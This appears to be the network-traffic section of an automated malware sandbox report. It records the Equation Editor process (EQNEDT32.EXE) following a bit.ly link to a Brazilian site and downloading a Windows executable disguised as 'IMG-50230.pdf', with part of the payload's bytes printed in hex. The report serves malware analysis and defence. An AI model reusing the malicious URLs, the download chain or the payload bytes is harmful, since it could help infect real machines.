                                                                                                                                                                                  Jan 27, 2021 06:51:28.322314024 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.322329044 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.322336912 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.322367907 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.322388887 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.322407007 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.322412968 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.322444916 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.322468042 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.322493076 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.322509050 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.322536945 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.322554111 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.322575092 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.322597027 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.322613955 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.322618961 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.322652102 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.322669983 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.322688103 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.322712898 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.322726965 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.322736025 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.322765112 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.322783947 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.322812080 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.322824001 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.322854996 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.322873116 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.322892904 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.322910070 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.322932005 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.322949886 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.322968960 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.322973967 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.323005915 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.323024035 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.323043108 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.323059082 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.323081017 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.323100090 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.323124886 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.323128939 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.323172092 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.323185921 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.323209047 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.323229074 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.323246956 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.323251009 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.323285103 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.323306084 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.323323011 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.323352098 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.323362112 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.323383093 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.323400974 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.323424101 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.323447943 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.323453903 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.323491096 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.323510885 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.323529959 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.323554039 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.323566914 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.323575020 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.323609114 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.323628902 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.323646069 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.323667049 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.323683977 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.323721886 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.323723078 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.323770046 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.323771954 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.323788881 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.323816061 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.323820114 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.323854923 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.323885918 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.323896885 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.323908091 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.323937893 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.323962927 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.323976040 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.323998928 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.324014902 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.324048042 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.324052095 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.324084044 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.324099064 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.324120045 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.324142933 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.324162960 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.324179888 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.324206114 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.324218035 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.324233055 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.324254990 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.324279070 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.324290991 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.324305058 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.324328899 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.324353933 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.324367046 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.324414015 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.324446917 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.324456930 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.324461937 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.324484110 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.324500084 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.324538946 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.324539900 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.324577093 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.324596882 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.326025009 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.326092005 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.326134920 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.326155901 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.326184988 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.326186895 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.326205015 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.326212883 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.326224089 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.326236963 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.326244116 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.326263905 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.326266050 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.326283932 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.326289892 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.326314926 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.326323032 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.326339960 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.326349020 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.326365948 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.326379061 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.326391935 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.326396942 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.326411963 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.326423883 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.326447010 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.326461077 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.326471090 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.326474905 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.326494932 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.326495886 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.326519012 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.326520920 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.326543093 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.326545000 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.326567888 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.326582909 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.326596975 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.326605082 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.326622963 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.326627016 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.326647997 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.326656103 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.326670885 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.326698065 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.586807013 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.586865902 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.587008953 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.587384939 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.587461948 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:28.587570906 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.598624945 CET4916680192.168.2.22177.70.106.69
                                                                                                                                                                                  Jan 27, 2021 06:51:28.857690096 CET8049166177.70.106.69192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:29.019206047 CET4916580192.168.2.2267.199.248.11

                                                                                                                                                                                  UDP Packets

                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                  Jan 27, 2021 06:51:24.503771067 CET5219753192.168.2.228.8.8.8
                                                                                                                                                                                  Jan 27, 2021 06:51:24.551803112 CET53521978.8.8.8192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:24.552100897 CET5219753192.168.2.228.8.8.8
                                                                                                                                                                                  Jan 27, 2021 06:51:24.599993944 CET53521978.8.8.8192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:25.191107988 CET5309953192.168.2.228.8.8.8
                                                                                                                                                                                  Jan 27, 2021 06:51:25.648433924 CET53530998.8.8.8192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:25.648818016 CET5309953192.168.2.228.8.8.8
                                                                                                                                                                                  Jan 27, 2021 06:51:25.705070972 CET53530998.8.8.8192.168.2.22
                                                                                                                                                                                  Jan 27, 2021 06:51:30.180989027 CET5283853192.168.2.228.8.8.8
                                                                                                                                                                                  Jan 27, 2021 06:51:30.238764048 CET53528388.8.8.8192.168.2.22

                                                                                                                                                                                  DNS Queries

                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                  Jan 27, 2021 06:51:24.503771067 CET192.168.2.228.8.8.80x7e45Standard query (0)bit.lyA (IP address)IN (0x0001)
                                                                                                                                                                                  Jan 27, 2021 06:51:24.552100897 CET192.168.2.228.8.8.80x7e45Standard query (0)bit.lyA (IP address)IN (0x0001)
                                                                                                                                                                                  Jan 27, 2021 06:51:25.191107988 CET192.168.2.228.8.8.80xef41Standard query (0)neuromedic.com.brA (IP address)IN (0x0001)
                                                                                                                                                                                  Jan 27, 2021 06:51:25.648818016 CET192.168.2.228.8.8.80xef41Standard query (0)neuromedic.com.brA (IP address)IN (0x0001)

                                                                                                                                                                                  DNS Answers

                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                  Jan 27, 2021 06:51:24.551803112 CET8.8.8.8192.168.2.220x7e45No error (0)bit.ly67.199.248.10A (IP address)IN (0x0001)
                                                                                                                                                                                  Jan 27, 2021 06:51:24.551803112 CET8.8.8.8192.168.2.220x7e45No error (0)bit.ly67.199.248.11A (IP address)IN (0x0001)
                                                                                                                                                                                  Jan 27, 2021 06:51:24.599993944 CET8.8.8.8192.168.2.220x7e45No error (0)bit.ly67.199.248.11A (IP address)IN (0x0001)
                                                                                                                                                                                  Jan 27, 2021 06:51:24.599993944 CET8.8.8.8192.168.2.220x7e45No error (0)bit.ly67.199.248.10A (IP address)IN (0x0001)
                                                                                                                                                                                  Jan 27, 2021 06:51:25.648433924 CET8.8.8.8192.168.2.220xef41No error (0)neuromedic.com.br177.70.106.69A (IP address)IN (0x0001)
                                                                                                                                                                                  Jan 27, 2021 06:51:25.705070972 CET8.8.8.8192.168.2.220xef41No error (0)neuromedic.com.br177.70.106.69A (IP address)IN (0x0001)

                                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                                  • bit.ly
                                                                                                                                                                                  • neuromedic.com.br

                                                                                                                                                                                  HTTP Packets

                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  0192.168.2.224916567.199.248.1180C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                  Jan 27, 2021 06:51:24.668931007 CET0OUTGET /3iWebUT HTTP/1.1
                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                  Host: bit.ly
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Jan 27, 2021 06:51:24.969619036 CET1OUTGET /3iWebUT HTTP/1.1
                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                  Host: bit.ly
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Jan 27, 2021 06:51:25.115094900 CET1INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                  Date: Wed, 27 Jan 2021 05:51:25 GMT
                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                  Content-Length: 130
                                                                                                                                                                                  Cache-Control: private, max-age=90
                                                                                                                                                                                  Location: http://neuromedic.com.br/cgi./IMG-50230.pdf
                                                                                                                                                                                  Set-Cookie: _bit=l0r5Pp-3298995411bad0e715-00a; Domain=bit.ly; Expires=Mon, 26 Jul 2021 05:51:25 GMT
                                                                                                                                                                                  Via: 1.1 google
                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 42 69 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 65 75 72 6f 6d 65 64 69 63 2e 63 6f 6d 2e 62 72 2f 63 67 69 2e 2f 49 4d 47 2d 35 30 32 33 30 2e 70 64 66 22 3e 6d 6f 76 65 64 20 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                  Data Ascii: <html><head><title>Bitly</title></head><body><a href="http://neuromedic.com.br/cgi./IMG-50230.pdf">moved here</a></body></html>


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  1192.168.2.2249166177.70.106.6980C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                  Jan 27, 2021 06:51:25.966811895 CET2OUTGET /cgi./IMG-50230.pdf HTTP/1.1
                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Host: neuromedic.com.br
                                                                                                                                                                                  Jan 27, 2021 06:51:26.232167006 CET3INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Wed, 27 Jan 2021 05:50:55 GMT
                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                  Last-Modified: Tue, 26 Jan 2021 23:10:22 GMT
                                                                                                                                                                                  ETag: "1d056b5-ccfe8-5b9d5c24f5257"
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  Content-Length: 839656
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Content-Type: application/pdf
                                                                                                                                                                                  Jan 27, 2021 06:51:26.232237101 CET4INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73
                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELZ!?ZJx @ `
                                                                                                                                                                                  Jan 27, 2021 06:51:26.232274055 CET5INData Raw: f1 a2 c4 fe 0c 01 00 d9 28 50 00 00 06 74 0b 00 00 02 fe 0e 06 00 14 14 20 6c 94 b0 a3 28 50 00 00 06 74 01 00 00 1b fe 0c 00 00 fe 0c 01 00 28 50 00 00 06 74 09 00 00 02 26 28 1a 00 00 06 74 05 00 00 01 28 49 00 00 06 75 0c 00 00 02 26 14 14 fe
                                                                                                                                                                                  Data Ascii: (Pt l(Pt(Pt&(t(Iu&-(t&--8:(Iu(Iu e~w(Pt(Pt-a(I
                                                                                                                                                                                  Jan 27, 2021 06:51:26.232312918 CET7INData Raw: 00 00 20 00 00 00 16 0a 17 13 04 2b ce 03 02 61 1f 36 59 06 61 45 01 00 00 00 05 00 00 00 1e 13 04 2b b8 1b 2b f9 18 13 04 2b b0 28 02 00 00 0a 06 17 58 0a 20 56 07 00 00 0b 20 2e 02 00 00 0c 20 ab 03 00 00 07 18 5b 08 59 7e 0f 00 00 04 20 0a 01
                                                                                                                                                                                  Data Ascii: +a6YaE+++(X V . [Y~ ~ Z _28i+*E&*8m0+BEt3+3El{E&+
                                                                                                                                                                                  Jan 27, 2021 06:51:26.232352972 CET8INData Raw: 00 00 20 69 03 00 00 28 02 00 00 2b 0d 09 2c 08 1b 13 05 38 75 ff ff ff 1f 09 2b f5 1c 14 1f 0e 20 07 f2 0f 07 28 24 00 00 06 73 17 00 00 0a 7a 18 13 05 38 55 ff ff ff 73 18 00 00 0a 80 06 00 00 04 18 13 05 38 43 ff ff ff 7e 06 00 00 04 d0 02 00
                                                                                                                                                                                  Data Ascii: i(+,8u+ ($sz8Us8C~( (+(+88*"*0 (+(*0(*0(t*0
                                                                                                                                                                                  Jan 27, 2021 06:51:26.232388973 CET9INData Raw: fe 0e 09 00 fe 0e 09 00 14 72 05 01 00 70 28 49 00 00 06 75 0d 00 00 02 fe 0e 0a 00 fe 0e 0a 00 00 38 84 00 00 00 00 00 fe 0c 05 00 fe 0c 05 00 fe 0c 07 00 28 50 00 00 06 74 09 00 00 02 26 de 68 00 fe 0c 05 00 fe 0c 05 00 14 fe 0c 05 00 28 1a 00
                                                                                                                                                                                  Data Ascii: rp(Iu8(Pt&h(t x5(Pt(Pt(Pt(Iu(Pt(Iu&:-5(Pt&(Iu
                                                                                                                                                                                  Jan 27, 2021 06:51:26.232426882 CET11INData Raw: 3d 00 10 4d 00 1a 00 00 00 00 00 00 00 00 6b 6b 00 4a 07 00 00 01 02 00 6f 02 1a 89 02 68 00 00 00 00 00 00 0c 03 22 2e 03 12 07 00 00 01 00 00 05 03 3f 44 03 67 07 00 00 01 00 00 15 05 24 39 05 35 07 00 00 01 00 00 dc 04 38 14 05 5d 07 00 00 01
                                                                                                                                                                                  Data Ascii: =MkkJoh".?Dg$958]I_pX~s (+t*(*0~t*0(u*0~+BElB
                                                                                                                                                                                  Jan 27, 2021 06:51:26.232456923 CET11INData Raw: 13 00 00 02 fe 0c 0a 00 fe 0e 0a 00 00 14 2d d7 00 de 00 00 fe 0c 06 00 2d 5c 00 fe 0c 06 00 2d 12 fe 0c 0b 00 fe 0e 0b 00 fe 0c 0b 00 fe 0e 0b 00 2b 31 00 14 fe 0e 0c 00 fe 0c 0c 00 fe 0e 0c 00 72 ef 01 00 70 28 49 00 00 06 75 06 00 00 02 26 28
                                                                                                                                                                                  Data Ascii: --\-+1rp(Iu&(t(Iu-(P
                                                                                                                                                                                  Jan 27, 2021 06:51:26.232490063 CET12INData Raw: 00 06 74 01 00 00 01 28 50 00 00 06 74 01 00 00 01 db 28 50 00 00 06 74 0d 00 00 02 26 28 1a 00 00 06 74 14 00 00 02 26 14 fe 0e 04 00 fe 0c 06 00 2d 5f fe 0c 00 00 fe 0c 00 00 fe 0c 00 00 28 1a 00 00 06 74 05 00 00 01 28 49 00 00 06 75 01 00 00
                                                                                                                                                                                  Data Ascii: t(Pt(Pt&(t&-_(t(Iu pku Hl(Pt(Pt&(t(Pt(Iu-C(t\(Pt(P
